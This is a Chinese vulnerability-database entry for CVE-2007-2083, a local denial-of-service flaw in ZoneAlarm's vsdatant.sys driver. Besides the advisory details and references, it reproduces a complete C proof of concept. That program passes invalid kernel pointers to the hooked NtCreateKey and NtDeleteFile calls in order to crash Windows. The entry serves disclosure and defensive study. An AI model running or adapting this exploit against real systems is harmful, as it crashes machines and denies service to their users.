ZoneAlarm SSDT函数多个输入验证本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112712 漏洞类型 其他
发布时间 2007-04-15 更新时间 2007-09-18
CVE编号 CVE-2007-2083 CNNVD-ID CNNVD-200704-307
漏洞平台 Windows CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/29860
https://www.securityfocus.com/bid/23494
https://cxsecurity.com/issue/WLB-2007040098
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-307
|漏洞详情
ZoneAlarm是一款个人电脑防火墙,能保护个人数据和隐私安全。ZoneAlarm所hook的SSDT函数中存在两个用户态参数验证错误,由于vsdatant.sys驱动中的错误,如果用户使用无效的参数值调用了NtCreateKey和NtDeleteFile参数的话,就可能导致系统崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/23494/info

ZoneAlarm is prone to a local denial-of-service vulnerability.

This issue occurs when attackers supply invalid argument values to the 'vsdatant.sys' driver.

A local attacker may exploit this issue to crash affected computers, denying service to legitimate users.

ZoneAlarm Pro 6.5.737.000 and 6.1.744.001 are prone to this issue; other versions may be affected as well. 

/*

 Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00001P000ZA)
 

 Usage:
 prog FUNCNAME
   FUNCNAME - name of function to be checked

 Description:
 This program calls given function with parameters that cause the crash of the system. This happens because of 
 insufficient check of function arguments in the driver of the firewall.

 Test:
 Running the testing program with a name of a vulnerable function.

*/

#undef __STRICT_ANSI__
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>

void about(void)
{
  printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00001P000ZA)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test FUNCNAME\n"
         "  FUNCNAME - name of function to be checked\n");
  return;
}



int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,NULL,0,NULL,NULL);

    for (oa.ObjectName=(PVOID)0x80000000;;oa.ObjectName+=0x0300)
      ZwCreateKey(&handle,0,&oa,0,NULL,0,NULL);

  } else if (!stricmp(argv[1],"NtDeleteFile") || !stricmp(argv[1],"ZwDeleteFile"))
  {
    OBJECT_ATTRIBUTES oa;
    UNICODE_STRING us={0x6B3,0x12,(PVOID)0x10000};
    InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
    ZwDeleteFile(&oa);
  } else printf("\nI do not know how to exploit the vulnerability using this function.\n");

  printf("\nTEST FAILED!\n");
  return 1;
}
|受影响的产品
Zone Labs ZoneAlarm Pro 6.5.737.000 Zone Labs ZoneAlarm Pro 6.1.744.001
|参考资料

来源:BUGTRAQ
名称:20070415ZoneAlarmMultipleinsufficientargumentvalidationofhookedSSDTfunctionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/465868/100/0/threaded
来源:MISC
链接:http://www.matousec.com/info/advisories/ZoneAlarm-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php
来源:XF
名称:zonealarm-vsdatant-dos(33664)
链接:http://xforce.iss.net/xforce/xfdb/33664
来源:OSVDB
名称:35239
链接:http://osvdb.org/35239
来源:SREASON
名称:2591
链接:http://securityreason.com/securityalert/2591